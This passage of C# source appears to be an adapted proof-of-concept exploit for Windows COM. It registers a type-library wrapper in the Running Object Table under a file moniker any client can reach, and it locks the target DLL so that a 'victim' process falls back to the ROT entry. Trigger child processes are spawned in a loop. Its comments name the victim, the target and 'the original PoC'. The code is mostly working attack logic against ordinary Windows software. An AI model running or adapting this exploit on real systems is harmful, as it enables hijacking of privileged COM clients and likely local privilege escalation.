                    Type t = Type.GetTypeFromCLSID(new Guid("26D6311A-A724-4C8C-B83A-2E60ECD47480"));
                    Activator.CreateInstance(t);
                   // (new mytestcom() as Imytestcom).mdtest();
                }
                else
                {

                    // Server role.
                    // tlb_path is the path the file moniker is built from, i.e.
                    // the path a client must ask for to hit the ROT entry.
                    // NOTE(review): hard-coded build-output path; the wrapper
                    // below loads a DIFFERENT file (C:\123\sys\testalt.dll).
                    // Presumably only the moniker path has to match what the
                    // victim requests — confirm both files exist on the target.
                    // modified version
                     string tlb_path = "C:\\project\\testalt\\Debug\\testalt.dll";
                   // string tlb_path = Path.Combine(Environment.GetFolderPath(Environment.SpecialFolder.System), "tapi3.dll");
                    //  Guid appid = new Guid("{4584EA27-6431-483D-8653-F96796E1A051}");
                  //  Guid appid = tapi3guid;
                    //new gen guid
                     //  Guid appid = new Guid("{4584EA27-6431-483D-8653-F96796E1A051}");

                    Guid appid =   new Guid("{3E5F704C-C0ED-491C-9BB5-EA1EAD8B31B7}");
                    //old 
                    // Guid appid = new Guid("{d056ebce-e7e9-4994-a5e6-de59430306c1}");
                    //  
                    // Process-wide COM security. With EOAC_APPID the first
                    // argument is an AppID whose registry key supplies the
                    // access/launch permissions (per the CoInitializeSecurity
                    // contract); cAuthSvc = -1 selects the default auth services.
                    // NOTE(review): RPC_C_IMP_LEVEL_IMPERSONATE here is the level
                    // THIS process grants when it acts as a client. Whether the
                    // victim grants impersonation to this server — which is what
                    // TypeLibWrapper.GetLibAttr relies on — is decided by the
                    // victim's own blanket, not by this call.
                    int hr = CoInitializeSecurity(ref appid, -1, IntPtr.Zero, IntPtr.Zero,
                        RPC_C_AUTHN_LEVEL_DEFAULT, RPC_C_IMP_LEVEL_IMPERSONATE, IntPtr.Zero, EOAC_APPID, IntPtr.Zero);
                    if (hr != 0)
                    {
                        IS.Marshal.ThrowExceptionForHR(hr);
                    }

                    // Register the wrapper in the ROT under the file moniker
                    // for tlb_path, reachable from any client security context.
                   TypeLibWrapper tlb = new TypeLibWrapper("C:\\123\\sys\\testalt.dll");
                    IMoniker moniker = CreateFileMoniker(tlb_path);
                    IRunningObjectTable rot = GetRunningObjectTable(0);
                   int flags = ROTFLAGS_ALLOWANYCLIENT | ROTFLAGS_REGISTRATIONKEEPSALIVE;
                   // int flags = 0;
                    int cookie = rot.Register(flags, tlb, moniker);
                    byte[] bts = new byte[4096];

                  ///  (new mytestcom() as Imytestcom).mdtest();
                    Console.ReadKey();
                    // Hold a byte-range lock on the first 4 KiB of the moniker's
                    // target for as long as the children run. NOTE(review): the
                    // purpose is not shown here — presumably to make a direct
                    // file load of tlb_path fail so the loader falls back to
                    // the ROT entry; verify against the write-up.
                    using (FileStream stm = new FileStream(tlb_path, FileMode.Open, FileAccess.Read, FileShare.Read | FileShare.Delete))
                    {
                        stm.Lock(0, 4096);
                        Console.WriteLine("Waiting");
                       
                      //  Guid g = new Guid("{21D6D48E-A88B-11D0-83DD-00AA003CCABD}");

                        // from the original PoC; g and tpLib are unused here
                        Guid g = new Guid("{9E175B68-F52A-11D8-B9A5-505054503030}");
                         object tpLib;
                      //    int b=  LoadRegTypeLib(ref tapi3guid, 1, 0, 0, out tpLib);

                         
                        // One trigger child per 4 KiB chunk of the locked file;
                        // each run waits for the child to exit and for a key.
                        while (stm.Read(bts, 0, 4096) > 0)
                        {
                            //Type t = Type.GetTypeFromCLSID(g);
                            //Activator.CreateInstance(t);

                            Process ps = Process.Start(Process.GetCurrentProcess().MainModule.FileName, "-x");

                             ps.WaitForExit();
                            Console.ReadKey();
                            Console.WriteLine("Exited");
                        }

                        Console.ReadKey();
                    }

                    // Only reached when the loop finishes normally; an exception
                    // leaves the ROT entry registered until the process exits.
                    rot.Revoke(cookie);
                }
            }
            catch (Exception ex)
            {
                Console.WriteLine(ex);
            }

            Console.ReadKey();
        }
    }
}
